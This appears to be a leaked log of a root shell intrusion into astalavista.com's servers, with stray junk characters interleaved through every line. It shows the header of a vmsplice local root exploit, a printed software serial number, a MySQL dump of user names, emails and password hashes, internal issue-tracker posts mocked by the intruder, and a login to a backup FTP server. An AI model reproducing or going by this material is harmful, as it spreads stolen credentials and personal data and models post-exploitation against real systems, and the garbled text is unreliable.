drwx—— 2 com com 4096 Jun 4 04:04 backups
# I: @! T! R* x, n* C1 {2 ?. v1 L-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
- Q# B# A) F7 G5 t/ W8 \drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system; p/ \$ ^) g* k/ D' W8 l2 a9 ]
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
2 p! R" K1 C$ h- `6 R( ]) Q-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout' l% g; p' \# c
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile* Y+ E, u, A5 y4 b
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc0 O w& J8 V% } p& G$ b& Z
drwx–x–x 3 com com 4096 Jan 29 2008 domains
2 X g" [# _: a( L0 j-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
9 @1 n' `1 K6 q7 f# \drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
1 A4 [8 n$ c% |- o* N! U2 Y-rw——- 1 com com 69 Nov 18 2008 .lesshst
+ Y8 z, I2 X# {- W& ]2 {drwx—— 2 com com 4096 Sep 24 2007 mail
; m5 X) c2 z j5 K$ F& J-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history% V; f% k% G" L8 f( L+ W- N. y9 G0 a
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp& i, l- _; l' b; r: Y. ^
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html6 z. [1 \' B* \2 M- N( o
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow/ X8 t E1 X$ G( f1 S0 D
drwx—— 2 com com 4096 Aug 26 2008 .ssh
3 D. F0 p {# U9 y6 v# p-rwx—— 1 com com 8515 Feb 10 2008 t9 ^* y3 q6 U. h; R
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c5 H$ V! Q# ~* @3 a ]
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
/ G! V) T3 v" C' p-rw-rw-r– 1 com com 617 May 20 2008 .toprc
7 Q R" m4 b! t2 e) {( y-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql: }) ]( d4 D1 L5 M4 ^) c
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
3 i0 X+ q* ?0 e-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
1 k/ F' Z9 I X }( N: s3 y" P! i0 }! z
sh-3.2# head t.c
- H& Z: S+ N& t; C! }, h/*! E4 m d p& v: d. Y( {
* jessica_biel_naked_in_my_bed.c8 h/ E9 ]) M* L
*
- O( e1 @- A( ?5 Z) f' D6 q, a: w4 R5 B* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.* d Y4 F. G9 v; u
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
) _, z: M* ~* q* V! p* Stejnak je to stare jak cyp a aj jakesyk rozbite.
5 @+ u" H) y* J0 n( M*
8 s" Y6 H d- a# E8 S* Linux vmsplice Local Root Exploit! `5 h6 X5 V7 v5 n/ f
* By qaaz( Y4 O" m2 a7 `+ J
*7 V5 `% m0 n$ }/ g7 z4 r/ x
; `% N: {! \' b* O& M
sh-3.2# cd /
, `7 }+ K3 Q, h8 @sh-3.2# ls -la
/ v7 [3 H/ M1 I3 itotal 360$ |' v9 H9 k6 K+ `- ~/ P$ o) R
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
( x1 B- p# ^+ z4 M* Rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
8 v4 z6 q: ^' l-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
5 b( _6 m. F7 m: a9 S! \% i3 A-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
3 }0 Z2 Y: |' g- U8 e$ _: _-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db; T! a1 |- n$ R" h9 i/ ]( Q7 U7 w
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
; P+ Q0 K# c& x' `2 F/ ]5 }! v-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel, Y5 p+ @. R. l; _ W
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup' h; b9 {) Z- m+ x5 V' y
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
: y5 m! [# }4 U: ]* f% Mdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot. l6 d$ h- O& @7 V' W, f8 w% R
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
% G% H% [# J' I+ Edrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
4 Y2 D |4 m( ?( U1 K. Adrwxr-xr-x 14 root root 4096 Mar 11 17:56 home6 Z" Z7 l$ D. I/ X4 s! h7 Q
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
; ~1 \1 J( e9 i( hdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
7 C' A' b/ U1 P9 V: Y3 m$ Qdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64: U& v; V) m) K7 E6 \
drwx—— 2 root root 16384 Sep 11 2007 lost+found# d1 w2 r3 k% S% G1 Z' F1 x
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media6 e9 @, P1 ?; [; x I
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
# ~% _* e) G- \5 J( S. S. u. U$ ]drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
. s& a% K2 k b: R; t" p-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg% ^: l* B0 N }; l6 o7 F/ R
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
( t/ Y5 F* E% ]4 f( O" kdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt" j; p% z7 ^# [; N. X% W
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
0 }) L0 h3 m; t+ d8 z; Gdrwxr-x— 15 root root 4096 Jun 4 08:40 root" w( c0 y$ A& L: R7 ]* d% A' l
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin" F- S/ @) w) ]. i
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux, D. H& _' f$ |7 e4 g% p. ]" l1 ?
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv( I+ d3 d8 \& p: ^- ^3 N
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
5 _ }+ j$ C8 x8 ^2 X) }drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
4 o) }' P# t8 a6 Z* N/ g$ C/ @! Z; n( |drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr# }0 L# Q+ |# @" Z/ O& s, G8 p
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var, u& R/ ` x6 Q( X1 i
4 f# J. y5 u6 A7 ~
sh-3.2# cd opt
! _5 H( ^1 I3 l! e+ ]7 V! xsh-3.2# ls -la
4 E7 m, ~) k8 e. I! j9 r/ Xtotal 20
3 B& f% p# T: ?1 n n; w4 O0 w! @drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
7 E+ _- C' y( f3 d1 adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
4 g! V' ~; M! ldrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws8 V% e' v8 x& ?' c5 ]: ~" J
) o: E* D- M* G" e3 g* z9 s% ?sh-3.2# cd lsws/( @! Z! g! C% G2 D$ q' B0 ]
sh-3.2# ls -la1 `, R \* @# F" m/ H1 {0 a1 a
total 108. s$ Q! d, _, A- [( Z& Z
drwxr-xr-x 15 root root 4096 Mar 20 2008 .% q! d+ t3 y4 a" B. n9 [ _
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..( t5 r1 A3 X9 v9 X) D3 E
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
4 v/ @" I0 f; v, ]9 q, edrwxr-xr-x 13 root root 4096 May 29 15:10 admin' q3 D8 K0 l+ `
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate% t0 J! O5 T7 {+ G1 L0 \, d
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
. V* T6 b0 L3 H l" e" c& O7 odrwx—— 4 apache apache 4096 Jun 3 02:43 conf( s' q; s M- K% ^% H- t
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT/ X% l2 k. K5 K% O3 Z3 o
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
1 q+ i9 V4 X8 a+ \drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
" V" Z% v. I+ o) |; hdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
U. v( Z: P4 o2 A4 v' R-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
4 f& Y; A; x9 C- U-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
k. O% ~# _& u" H-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL2 x8 C. j- V9 `- v% z0 O
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP$ d: S6 x3 k: s
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs5 k7 d+ J% S _4 _; ^
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
: l5 ?# \) D, vdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
& \# S9 ?6 ]' r2 [/ e/ p% L, @8 tdrwxr-xr-x 3 root root 4096 Mar 20 2008 share0 b9 ~6 L8 X/ r! L
-rw-r–r– 1 root root 6 May 29 15:10 VERSION$ F" y9 S/ L- @) Q% S! ~ J, F
" P+ }9 P& i7 [, x0 t# osh-3.2# cd conf+ T% [5 z$ ?$ F7 d! `; z# b
sh-3.2# ls -la
' J9 g4 n6 R$ U) q3 q4 \ F$ ]total 48# f( @; w1 @0 l( g6 H* ~- [
drwx—— 4 apache apache 4096 Jun 3 02:43 .
) g! l0 W! N! [8 C4 F: R. Hdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
& J& q; z; s& a' ^drwx—— 2 apache apache 4096 Mar 20 2008 cert$ X% u# o' v. C" T9 ]. s X5 ?) i$ ]
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
# [! d; n& r- Q: m1 w N. `' p: ]3 B+ Y-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak& t. q3 Q' v/ K/ B
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
6 h' \, M6 L7 |3 v-rw——- 1 apache apache 256 May 29 15:10 license.key
& a* T+ a! w0 ^5 |4 O" J-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
2 k% `% y( Y* ?) s) \-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
5 K# d( \) Z8 ~- G- t# s-rw——- 1 apache apache 20 May 29 15:10 serial.no. j: b7 ?' ~6 v# K8 n
drwx—— 2 apache apache 4096 Mar 20 2008 templates
$ ~1 J2 V' Y$ l& h
9 J+ }* ~" O" V- t" z6 O* ksh-3.2# cat serial.no$ f8 }: }9 f7 {0 Y w# I& j
IbDl-oVsO-CKqL-wVRa
6 B2 ^7 Y( U, G) m
0 d5 Q0 N0 p! c% Esh-3.2# mysql
) A# N, H, Z4 a& }: d& OWelcome to the MySQL monitor. Commands end with ; or \g.
! p& j4 P+ L M/ k; y6 v4 J- O% |3 jYour MySQL connection id is 286844
& i5 E# b1 B2 z' d4 M. ^Server version: 5.0.45-community-log MySQL Community Edition (GPL)
5 J4 Z5 B6 m8 F; c" b* a9 e0 y! A1 _) O3 h4 Z1 G
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; Y8 Y' F$ d+ B2 o/ |1 D6 P/ v9 ?: c T3 L* d0 ^# z- g. @
mysql> show databases;
5 D3 F! Q2 {: r. J7 P2 z% Q6 b+———————–+
) f5 e1 g1 `4 C+ P' j) \4 f2 @2 C| Database |
3 D& L2 b. E; b+———————–+
# L+ O! W' o% i- ?$ }| information_schema |
g+ f. ~0 u" Y2 W' ~, u( a. ~| astanet_ads |
7 }! G( k# h& N; ]| astanet_mailing_lists |( i [/ H0 r0 ^/ G9 j) @; F
| astanet_mediawiki |" d: n, ^9 ]- U5 L3 K
| astanet_membersystem |
4 e) b( a$ X7 t9 Z| com_contrexx |8 \$ V4 A5 s, ]
| com_contrexx2 |! O# X& a- L V% c4 r. k
| com_contrexx2_live |
0 X4 u6 P: O0 f* }; `7 t# m! T| da_roundcube |* O G+ x% X0 C$ ^+ T
| dolphin |
/ ]) K- T7 r) m7 v| ideapool |
/ g0 k. R6 P3 W' X* t| mysql |9 z, N U; R e" `2 P2 z
| test |8 t- c+ c: V% C& S
| yourmaster |0 a: U* L, U, Q3 S" a
+———————–+
1 p: E U$ R. _14 rows in set (0.00 sec)
0 e* T4 N# O- ~4 N3 P$ J; f6 o# f7 D( l+ @, |
mysql> use ideapool
\) h0 }0 }! W) c6 MDatabase changed" \! c- V4 h7 v' z R1 ]
mysql> show tables;9 J6 }" g9 w. d+ k4 `) o
+———————————–+
7 u @ Z( |% D% k/ r% Z9 a| Tables_in_ideapool | {7 D& S# A6 I- P3 ]) P" t
+———————————–+
7 b2 h$ i9 [( A8 o1 f| eventum_columns_to_display |
- H# q( t* U4 N5 m4 {| eventum_custom_field |& m* k3 y: v' Z4 z, E+ W W
| eventum_custom_field_option |
}( W4 G# @. ]' x1 ]! n' l. @| eventum_custom_filter |
8 O6 @$ ` Z$ {3 P G* A| eventum_customer_account_manager |& E$ g* l1 D! i' F5 B
| eventum_customer_note |' r0 h% Y7 j% ]* B6 ]- I z; H
| eventum_email_account |8 w- |9 W1 `# `3 w# B
| eventum_email_draft |* D% S# x$ E! E$ @1 W; k; U
| eventum_email_draft_recipient |* g) ~/ O; \8 s; K4 g
| eventum_email_response |
& I; Q# J0 \" K3 o7 C| eventum_faq |: V- L4 t5 N6 E- {+ `1 A/ x3 I8 T
| eventum_faq_support_level |! E9 O1 X5 }* W- e" z
| eventum_group |+ V% s- ?$ r% O2 ^% Z9 n
| eventum_history_type |6 j0 K+ G" z: U1 @
| eventum_irc_notice |- ]6 l# I1 x9 }$ V; B, g
| eventum_issue |
$ S o) Y* K( m# ] b| eventum_issue_association |
$ Z8 ~. Q6 T1 T6 o+ m| eventum_issue_attachment |! f, I5 h: C& b# u* [6 ]; L+ `, _
| eventum_issue_attachment_file |' @/ f( D4 g9 |" z# {
| eventum_issue_checkin |4 u$ j- `/ e1 L5 r
| eventum_issue_custom_field |2 M$ X, V. V L6 p9 W
| eventum_issue_history |
2 K0 g5 k) X+ I' T$ n% ?| eventum_issue_quarantine |
5 L8 q X. u+ D/ p- B| eventum_issue_requirement |: G; z. K9 Q5 J8 V$ i0 ?
| eventum_issue_user |
. f! v& ]2 q% s9 X: F+ A# b| eventum_issue_user_replier |9 n3 T0 p( u% d! E
| eventum_link_filter |4 O: c2 D/ w' e0 b) k
| eventum_mail_queue |
+ x R9 j' t$ i8 O, X. s| eventum_mail_queue_log |/ K& G/ x4 l$ u8 g
| eventum_news |
0 f# N( t7 X3 f9 V| eventum_note |, w8 ~/ o6 G. U# s) p5 l; g
| eventum_phone_support |
/ w+ t; E8 g# K1 T1 T$ ]; r8 x| eventum_project |
% j" ^ s! \4 F, t1 K| eventum_project_category |% C. y+ R& e8 p9 C' V( X& g
| eventum_project_custom_field |
& n& I( E" ?- ~# k8 p4 j7 T| eventum_project_email_response |
) p% B8 M6 ]7 |8 {$ u ~| eventum_project_field_display |% D6 V+ l5 H0 f [* C
| eventum_project_group |
1 i+ I) F( x, b0 f' A7 s, Q| eventum_project_link_filter |& i3 R: X2 {6 R+ u+ C
| eventum_project_news | F c) X. }: k. Z
| eventum_project_phone_category |
8 d3 V- O, Z2 v, {7 W3 X- [' L| eventum_project_priority |
) G5 S# A# j) R5 m| eventum_project_release |
" G4 _# }8 Y3 M% A1 s1 ?| eventum_project_round_robin |
4 k+ p: n; h& d% {| eventum_project_status |6 ?5 R# u$ `) r/ {# B' P
| eventum_project_status_date |
9 O4 h+ z: t5 D# j' k/ k1 t; }% p| eventum_project_user |" `5 Z# J8 e. i; O# G1 n& ^' t
| eventum_reminder_action |$ w( |) t1 P8 V7 j: L) I
| eventum_reminder_action_list |8 ]9 w. a* \0 u- _. P
| eventum_reminder_action_type |
1 t) I/ y: Z- k: L% X/ Q$ M| eventum_reminder_field |, T$ D- S2 u, b$ {( L* j% u) ^
| eventum_reminder_history |
p8 n9 G: v8 o) ?0 G7 d7 e| eventum_reminder_level |
3 w) p) U: G8 |9 T# }% `8 f| eventum_reminder_level_condition |# N, G# h0 N# t% ?5 J* ^
| eventum_reminder_operator |6 Y/ p3 m5 _/ F, L" [/ X( }
| eventum_reminder_priority |
( a. z: f( ^0 Y| eventum_reminder_requirement |8 H B: y7 m5 `# R" u+ `0 |7 r
| eventum_reminder_triggered_action |
, q8 w% Y) ~0 B) N# r| eventum_resolution |: W& S! j; p, j; v( d
| eventum_round_robin_user |
) m7 J- M* d% [/ [0 }& E% y| eventum_search_profile |
8 k+ C- c5 F3 q* e" O( P }) O| eventum_status |
7 c) Q- d/ {! q2 s P$ ~; _| eventum_subscription |: O( G* H2 o# z
| eventum_subscription_type |4 T" g; |+ s2 M# [; d& Z: y
| eventum_support_email |
% _6 m% e2 u$ d8 t$ t" Q* r5 i2 g8 j| eventum_support_email_body |
1 V# s! o, s# \ ?7 t1 P( V| eventum_time_tracking |
; K3 H+ Y: X5 |! |- z. p5 x5 e+ o| eventum_time_tracking_category |+ Y- O4 C' m9 x: ]/ v- P5 k( h
| eventum_user |
, Y+ t+ p0 r+ b; G7 \& o4 B+———————————–+7 `9 [0 K4 _3 \' ]% u
69 rows in set (0.00 sec)
( `4 x3 N, \0 q4 X5 [0 r: O# O4 v- o, u) C
mysql> describe eventum_user;
; [* O' }5 l8 M* v7 {' }0 u1 t5 [+————————-+——————+——+—–+———————+—————-+
9 P5 S! Y- j* D6 ^3 ?* A% `| Field | Type | Null | Key | Default | Extra |) D# N. S2 k1 k# n/ k0 F
+————————-+——————+——+—–+———————+—————-+1 s9 @$ q* u& W+ y3 q d# v+ i: }5 J
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
9 A R# K H& p3 |. x, n2 I| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
$ s% r3 c5 X! z, |( _- X| usr_customer_id | int(11) unsigned | YES | | NULL | |
' m# S0 \ |6 A4 s \7 x. @# y. c+ T| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |% F. v8 e' {6 l$ @2 ]
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |+ U! R2 ]' J% y* _. k
| usr_status | varchar(8) | NO | | active | |6 e. X! w0 K W- x. h
| usr_password | varchar(32) | NO | | | |
; I+ f2 }2 A2 a0 l% s| usr_full_name | varchar(255) | NO | | | |
. b9 [1 c! ?7 @ i" D7 t" T' b| usr_email | varchar(255) | NO | UNI | | |4 \$ z% l" n$ w4 N
| usr_preferences | longtext | YES | | NULL | |6 G0 `! y& u0 G
| usr_sms_email | varchar(255) | YES | | NULL | |
1 R& Y- o- a. a" i: o3 E| usr_clocked_in | tinyint(1) | YES | | 0 | |
0 [$ c4 _- P& J$ o# t7 l/ R% b| usr_lang | varchar(5) | YES | | NULL | |- B! v( `3 M+ V' Z' Q
+————————-+——————+——+—–+———————+—————-+( u" p" @% p" h- [; |
13 rows in set (0.00 sec)* t# c! z2 s. ~; _: N
) @2 p0 h/ R: V$ h
mysql> select usr_full_name,usr_email,usr_password from eventum_user;/ \+ \6 q& w0 P+ `* p6 L
+———————-+——————————-+———————————-+
4 v5 T4 G3 S2 Z| usr_full_name | usr_email | usr_password |
4 {% f: Z2 s' m+———————-+——————————-+———————————-+
: J, S( P: e, v; e: m| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 | w- `: A8 l; c7 d* E" h! f, E
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
8 p. e1 w4 x& a4 E6 \" _" E| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |1 M9 e0 G/ m% q% S; L9 Z6 [
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
( K+ c6 g6 W$ y" O. `2 N" t W| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |# S; W( r, j: J1 Z) ?* f
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
* V. J: P, W+ q( d| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
, ~/ v2 T! z1 J8 m; s! f) ^| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
, g- g+ L9 E; r7 J. Y( U: F4 ?| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |: b3 R# \6 ^- J
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
6 z: N/ i1 u' d. w8 T| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
2 E6 h( }) {0 }5 M; E| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
" s7 D$ v0 n/ T- t1 a, i& g# F| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
4 y' D, {9 n, h| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |, | R/ @7 f5 k: `: C2 y% C$ A0 q- ], [, X
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |" I* P; g2 P! L* ~; ~
+———————-+——————————-+———————————-+
: P @+ T6 Z& E' X" D15 rows in set (0.00 sec)
0 X" f q3 B- \. q8 t; T- G7 n0 O" Z A5 Q. B
mysql> select iss_description from eventum_issue where iss_id = 43;
% F8 u1 g# u) F9 y! N9 o: e+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+6 p2 V4 z* I- Z
| iss_description
- `% T8 ?7 L/ X2 o6 a|
# Z# q: g+ U5 ~$ i9 S, q+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
2 M! \4 Q3 p V| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
/ ~$ P2 y; O8 @% q( d, j d% T, [connected for 90 mins… 120mins… so what i propose is something like:
+ x( ?4 W% H2 W9 o0 z7 ]链接标记[url]http://www.surfthechannel.com/[/url]
5 x6 @: ^% k" i8 V1 ssince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system6 ^" o: l; @6 K
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
9 {$ x, |( z1 S2 P9 R4 [" _* Tbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
1 ]/ C \! ] h/ Z% U2 I: Eif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
4 I/ }. n: Z Z2 n3 `. o9 T1 _/ M4 A" |* f1 M) g1 s" Q' x
We could also put advertisement during play on the flash video player itself… extra $$…5 t; x( R& s7 z5 @* [1 a" G
$ W4 M3 D4 I. t- [By sykadul |; U' J$ ]6 }& b- ~# x, j2 ]
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* V* Z7 \+ c( a$ Y3 O7 j
1 row in set (0.00 sec)
$ a; v/ I; O" h: I8 Q! r& F/ T$ K( m2 _6 @& `8 m
// Money and extra $$ is all they care about. remember that.
/ T+ i- G( ?0 s; x# r; g% n: f) S0 {6 A5 S- c5 C( u
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
( G( v T8 e: ]- F+————————+——————————————————————————————————————————————————————————————————————————————-+& n% U) L8 D; n. b# k
| iss_summary | iss_description : I! Z: m$ _! s
|
4 W0 ~3 e2 ^6 \( r9 ~+————————+——————————————————————————————————————————————————————————————————————————————-+
" W$ F0 b9 g% ?| Forum for REAL EXPERTS | Hello,
% w3 y+ U" R! ~" n
+ q2 C) G$ w$ e; u7 L( m7 m/ PIshtus and I,2 [9 V8 G' C' D
$ K2 f/ M! W+ z8 z9 p0 h3 u0 yCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide- L g& P# J/ P: f( J, A4 j. L0 A
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..& p. x5 F' B# D! O6 X: O7 i
) p3 ^) _' K5 z
One example a friend of mine from coresecurity.com!
6 D: V6 T; `, q6 O$ `! M4 s
( n/ P6 r/ Z: X4 Y+ RWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..- \, P9 B# _# Y
2 i7 N' s/ Z' z2 z
|
( Q/ d- z$ L. g: e6 L% o) v. h+————————+——————————————————————————————————————————————————————————————————————————————+# v- o( Q9 n3 H( h5 R$ K
1 row in set (0.00 sec)
6 k) I& C& h( L Q9 K& G) D7 {5 H# C
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…2 w2 G2 C5 ~9 J
5 B0 ~+ ?2 w- S; o4 Lmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
$ L2 P! }* z G* B/ C+——————+———————————————————————————————+
" f) V; I: T" n7 p% @: f| iss_summary | iss_description |
5 w$ o( e& E; q$ o- A M+——————+———————————————————————————————+) j' V0 ~! k3 l, j- H) @
| Website guidance | Virtual Girl which guides you trought the website.) K, n) q* P' M6 ~& g
; s1 g8 l3 p# P3 J- \1 _We need a girl with who you can ( talk )!!!
6 H) t7 m# s* N* qAlso for the News!1 G+ n6 s/ ]9 o' J/ K
So my suggestion is a girl who read you the news loud if you like! m9 o: t' @% Q" l' d
you can choose between read yourselfe or she read it for you or both!! r& o% h7 ?( V
: M8 W6 `. o- M2 W5 QGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
' _: p' D4 Q# k4 c
; E3 d' f7 i. j" c6 A; H. A( M) fHave a look on the example girls!!7 R! {* E$ U- N% ]) C, i
q: ~4 B) [; F5 |链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
# K! {/ r0 F+ b: g ^1 v8 r0 J& p+ S0 J
or that
4 b6 C( m G+ X) @! z3 y7 I' {/ N9 A/ ?4 L
链接标记[url]http://www.yellostrom.de/[/url]
# Q% {1 S( e: a! `% H6 C: P: S1 B+ U* X# Z
|
7 M" ~ `, L# i9 k4 H+——————+———————————————————————————————+
7 c4 S4 h, {' Z: t& \1 row in set (0.00 sec), b& R: ~/ F6 y$ a8 b; l1 p8 u# B
7 Q- G& J& A1 N/ ?9 Q8 u4 {" }// ha ha.
! m) L0 b4 W+ P: w# Q
* ^8 \1 j" ^: m6 z& lmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;5 P/ W! Z9 G. z) f% k
+————————–+———————————————————————————————————–+
0 p9 R1 s/ |' D1 S& b: D| iss_summary | iss_description |
0 U. ]% \1 i6 ^! g+————————–+———————————————————————————————————–+9 @# i0 V% o& y1 a) j# ?5 x
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
4 a8 z3 |5 Q" q1 j! ], A+————————–+———————————————————————————————————–+
8 r w0 O! I- M1 row in set (0.00 sec)
/ g) g4 G% \& f3 g) V! K
8 R3 L; X& Z, Y; v// LOL.
- _) l6 [ `+ o: h# m T
% ^, S5 b7 K( z) z2 k) H) g) Vmysql> exit
7 k! ?) |4 G0 f1 ?0 LBye
/ i- T6 I7 |; x) x4 r, h
/ b: H) o( a+ ^5 p" X/ e$ R- v& csh-3.2# ftp 212.254.194.163
9 [% Y! m: ~ E' FConnected to 212.254.194.163.* ~- K3 B* |* ?
220 BackupCOM_VW FTP server ready.
; H# D3 q e8 v504 AUTH: security mechanism ‘GSSAPI’ not supported.
" J0 e4 E5 O4 F/ F/ g+ Y, W# Y504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.9 O- a5 P1 e* m3 F+ N& s5 [. i. w
KERBEROS_V4 rejected as an authentication type
& \( g: a4 ~, v% XName (212.254.194.163:root): astalavista.com
. u* D: I4 ]+ `& C4 Y3 c7 ^331 Password required for astalavista.com.9 f2 ^3 | S) V) Y
Password:
: d; s! u- U" C3 K) I0 L230 User astalavista.com logged in.
# m( D* e- t% A! _9 yRemote system type is UNIX.1 o+ Y* ]6 u) Y1 p+ L( F+ W
Using binary mode to transfer files.
( [) V/ b. O, H" `3 d1 u% d* `ftp> ls -la
# G0 R: l" ^4 b$ B u! T227 Entering Passive Mode (212,254,194,163,2,188)' D, N( D4 R3 @3 `7 X2 m
150 Opening BINARY mode data connection for ‘file list’.
& t+ c5 X5 j5 d, E y2 Z7 Sdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
0 c- U) E- g" J& D6 f226 Transfer complete., x3 x* O7 x8 O9 P- g+ h" j
ftp> cd astalavista.com
8 S; G, t- L; k% _1 Q6 I250 CWD command successful., J8 H! q7 {; p" ]
ftp> ls -la
# P, S F" l7 O227 Entering Passive Mode (212,254,194,163,2,189)3 y$ I6 N& ^1 w; X9 T" ?) x
150 Opening BINARY mode data connection for ‘file list’.! N+ [4 B; t8 ?
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar4 R5 y, M% q) T# ~' c
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
